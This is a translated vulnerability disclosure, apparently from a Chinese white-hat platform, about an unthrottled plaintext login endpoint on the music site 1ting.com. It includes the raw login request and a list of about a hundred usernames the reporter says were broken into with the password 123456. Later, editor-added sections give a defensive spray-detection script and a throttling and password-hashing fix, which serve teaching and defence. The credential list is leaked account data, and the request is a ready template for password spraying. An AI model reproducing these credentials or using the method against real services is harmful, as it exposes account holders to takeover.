Vulnerability summary (followers: 24)

Vulnerability details
Disclosure status:
2014-11-10: details sent to the vendor, awaiting the vendor's handling
2014-11-10: vendor has confirmed; details visible only to the vendor
2014-11-20: details disclosed to core white hats and relevant domain experts
2014-11-30: details disclosed to ordinary white hats
2014-12-10: details disclosed to intern white hats
2014-12-25: details disclosed to the public
Brief description:
Still paying to download music?! Look, your account has already been brute-forced!
Asking for Rank 10!! Let me get promoted to intern white hat
Detailed description:
Endpoint: http://my.1ting.com/login
No CAPTCHA, no rate limiting, and credentials are sent in plaintext.
Request sent:
POST /login HTTP/1.1
Host: my.1ting.com
Proxy-Connection: keep-alive
Origin: http://my.1ting.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://my.1ting.com/login
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: CNZZDATA30022181=cnzz_eid%3D1759656400-1415539659-http%253A%252F%252Fwww.1ting.com%252F%26ntime%3D1415539659; Hm_lvt_32c12acc9a2efc3fa896bb3ebcd47ee7=1415541766; Hm_lpvt_32c12acc9a2efc3fa896bb3ebcd47ee7=1415541827
Content-Length: 45
user_login=12&user_passwd=123456&redirect=%2F
A big batch of accounts as proof:
josh	123456
ted	123456
lula	123456
jae	123456
dur	123456
dee	123456
ase	123456
xenia	123456
mac	123456
joanie	123456
car	123456
erda	123456
l3	123456
damon	123456
abbie	123456
laird	123456
hilton	123456
rich	123456
nell	123456
SMART	123456
remy	123456
mae	123456
tine	123456
dov	123456
opqw	123456
MFG	123456
bree	123456
pip	123456
adan	123456
merrie	123456
nike	123456
mimi	123456
klklkl	123456
megan	123456
shir	123456
koren	123456
ruth	123456
joey	123456
dana	123456
nobie	123456
amery	123456
mimi	123456
sam	123456
tutor	123456
hube	123456
zeb	123456
merle	123456
ardis	123456
960123	123456
arlen	123456
polly	123456
tedd	123456
minda	123456
lesley	123456
elke	123456
blake	123456
alla	123456
mnmn	123456
des	123456
nani	123456
rona	123456
min	123456
mmtt	123456
211211	123456
jim	123456
kiki	123456
denny	123456
fan	123456
ross	123456
barb	123456
alis	123456
boyboy	123456
770815	123456
andi	123456
errol	123456
roman	123456
taffy	123456
jason	123456
hazel	123456
751224	123456
mmmmmmm	123456
kali	123456
kayle	123456
karel	123456
addie	123456
751206	123456
rubin	123456
stefa	123456
toni	123456
jemima	123456
shalom	123456
winne	123456
vince	123456
weiq	123456
rad	123456
ivory	123456
huaiyong	123456
cat123	123456 
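The pattern in the list above (one common password tried once against many different accounts from a single client) is what a login endpoint with no rate limit lets through silently. The following is an added example from the editor, not code from the reporter or from the site: a detector that slides a per-client window over constructed access-log lines for the /login endpoint and raises a password_spray alert when one address tries many distinct accounts, and a brute_force alert when one address accumulates many rejected logins. The log format, the RFC 5737 documentation addresses and every event in SAMPLE_LOG are assumptions constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample access-log lines for the /login endpoint (not real traffic
# from the site). Format assumed here: timestamp, client IP, method, path,
# submitted username, HTTP status returned (200 = login accepted, 401 = rejected).
SAMPLE_LOG = """\
2014-11-10T12:00:01 203.0.113.5 POST /login user=josh status=401
2014-11-10T12:00:01 203.0.113.5 POST /login user=ted status=401
2014-11-10T12:00:02 203.0.113.5 POST /login user=lula status=200
2014-11-10T12:00:02 203.0.113.5 POST /login user=jae status=401
2014-11-10T12:00:03 203.0.113.5 POST /login user=dur status=200
2014-11-10T12:00:03 203.0.113.5 POST /login user=dee status=401
2014-11-10T12:00:04 203.0.113.5 POST /login user=ase status=200
2014-11-10T12:01:00 192.0.2.77 POST /login user=admin status=401
2014-11-10T12:01:01 192.0.2.77 POST /login user=admin status=401
2014-11-10T12:01:02 192.0.2.77 POST /login user=admin status=401
2014-11-10T12:01:03 192.0.2.77 POST /login user=admin status=401
2014-11-10T12:01:04 192.0.2.77 POST /login user=admin status=401
2014-11-10T12:01:05 192.0.2.77 POST /login user=admin status=401
2014-11-10T12:05:00 198.51.100.9 POST /login user=alice status=401
2014-11-10T12:05:30 198.51.100.9 POST /login user=alice status=200
this line is not a login event and is skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) POST /login user=(?P<user>\S+) status=(?P<status>\d{3})$"
)


def parse_line(line):
    """Parse one log line into an event dict, or return None if it is not a /login POST."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "ip": m["ip"],
        "user": m["user"],
        "ok": m["status"] == "200",
    }


def analyze(log_text, window=timedelta(seconds=60), max_users=5, max_failures=5):
    """Slide a per-IP window over the log and raise two kinds of alert.

    password_spray: one client tries >= max_users distinct accounts within the
                    window (one guess per account, as in the report above).
    brute_force:    one client accumulates >= max_failures rejected logins
                    within the window (many guesses against few accounts).
    Alerts are keyed by (rule, ip); the stored snapshot is refreshed on every
    event while the condition holds, so it reflects the whole burst.
    """
    recent = defaultdict(deque)   # ip -> events still inside the window
    alerts = {}
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        q = recent[ev["ip"]]
        q.append(ev)
        while q and ev["ts"] - q[0]["ts"] > window:
            q.popleft()
        users = {e["user"] for e in q}
        failures = sum(1 for e in q if not e["ok"])
        compromised = sorted({e["user"] for e in q if e["ok"]})
        snapshot = {
            "ip": ev["ip"],
            "last_seen": ev["ts"].isoformat(),
            "distinct_users": len(users),
            "failures": failures,
            "compromised": compromised,   # accounts that accepted a guess during the burst
        }
        if len(users) >= max_users:
            alerts[("password_spray", ev["ip"])] = dict(snapshot, rule="password_spray")
        if failures >= max_failures:
            alerts[("brute_force", ev["ip"])] = dict(snapshot, rule="brute_force")
    return list(alerts.values())


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

Run against SAMPLE_LOG, the spraying client 203.0.113.5 is flagged with three accounts that accepted the guess, 192.0.2.77 is flagged for hammering one account, and 198.51.100.9 (a user who mistyped once) raises nothing. The "compromised" list is the part an incident responder acts on first: those accounts need a forced password reset, not just the source address blocked.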
Proof of vulnerability: (same content as in the detailed description above)
Fix recommendation:
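The report leaves this section empty. As an added example from the editor (not the reporter's or the vendor's code), the block below shows the server-side controls the description implies are missing: a sliding-window throttle keyed by client address and by account, an account lock after repeated failures, salted PBKDF2 password storage with a constant-time comparison, and one generic error message for every failure path so the endpoint does not reveal whether an account exists or is locked. The class and function names, the limits and the demo account are assumptions for the example; serving the endpoint over HTTPS is assumed to be handled outside this code.

```python
import hashlib
import hmac
import secrets
import time
from collections import defaultdict, deque

PBKDF2_ITERATIONS = 100_000
GENERIC_ERROR = "invalid username or password"   # one message for every failure path


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Return (salt, digest); store these instead of the plaintext password."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def verify_password(password, salt, digest, iterations=PBKDF2_ITERATIONS):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison


# Hashed for unknown usernames so response time does not reveal whether an
# account exists (constructed placeholder value, computed once at import).
_DUMMY_SALT, _DUMMY_DIGEST = hash_password("placeholder-not-a-real-password")


class LoginGuard:
    """Sliding-window throttle for a login endpoint, keyed by client IP and by account.

    ip_limit:      failures one address may accumulate within `window` seconds
                   before all of its login attempts are refused (curbs one
                   password being tried across many accounts from one source).
    account_limit: failures against one account within `window` before that
                   account is locked for `lock_seconds` (curbs guessing against
                   one account from any number of addresses).
    """

    def __init__(self, window=300.0, ip_limit=20, account_limit=5, lock_seconds=900.0):
        self.window, self.ip_limit = window, ip_limit
        self.account_limit, self.lock_seconds = account_limit, lock_seconds
        self._ip_failures = defaultdict(deque)
        self._account_failures = defaultdict(deque)
        self._locked_until = {}

    def _prune(self, q, now):
        while q and now - q[0] > self.window:
            q.popleft()

    def allowed(self, ip, username, now):
        if self._locked_until.get(username, 0.0) > now:
            return False
        ip_q, acct_q = self._ip_failures[ip], self._account_failures[username]
        self._prune(ip_q, now)
        self._prune(acct_q, now)
        return len(ip_q) < self.ip_limit and len(acct_q) < self.account_limit

    def record_failure(self, ip, username, now):
        self._ip_failures[ip].append(now)
        acct_q = self._account_failures[username]
        acct_q.append(now)
        self._prune(acct_q, now)
        if len(acct_q) >= self.account_limit:
            self._locked_until[username] = now + self.lock_seconds

    def record_success(self, username):
        self._account_failures.pop(username, None)
        self._locked_until.pop(username, None)


def login(guard, users, ip, username, password, now=None):
    """Return (accepted, message). `users` maps username -> (salt, digest)."""
    now = time.monotonic() if now is None else now
    if not guard.allowed(ip, username, now):
        return False, GENERIC_ERROR          # throttled: same message as a bad password
    record = users.get(username)
    if record is None:
        verify_password(password, _DUMMY_SALT, _DUMMY_DIGEST)   # equalise timing
        guard.record_failure(ip, username, now)
        return False, GENERIC_ERROR
    if verify_password(password, *record):
        guard.record_success(username)
        return True, "ok"
    guard.record_failure(ip, username, now)
    return False, GENERIC_ERROR


if __name__ == "__main__":
    # Constructed demo store; the account and password are not from the report.
    store = {"demo_user": hash_password("Tr0ub4dor&3-constructed")}
    guard = LoginGuard(account_limit=3)
    for attempt in ("wrong", "wrong", "wrong", "Tr0ub4dor&3-constructed"):
        print(attempt, login(guard, store, "203.0.113.5", "demo_user", attempt))
```

The demo at the bottom shows the lock taking effect: after three wrong guesses the correct password is refused with the same generic message until the lock expires. The per-account lock exists because a per-address limit on its own is defeated by spreading attempts over many addresses; in production the two limits are usually complemented by a CAPTCHA or second factor after the first few failures, and the counters live in a shared store such as Redis rather than in process memory.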
Copyright notice: when reposting, please credit the source 花心h@乌云
Vulnerability response
Vendor response:
Severity: Low
Vulnerability Rank: 5
Confirmed at: 2014-11-10 13:35
Vendor reply:
Thanks for the reminder.
Latest status:
None yet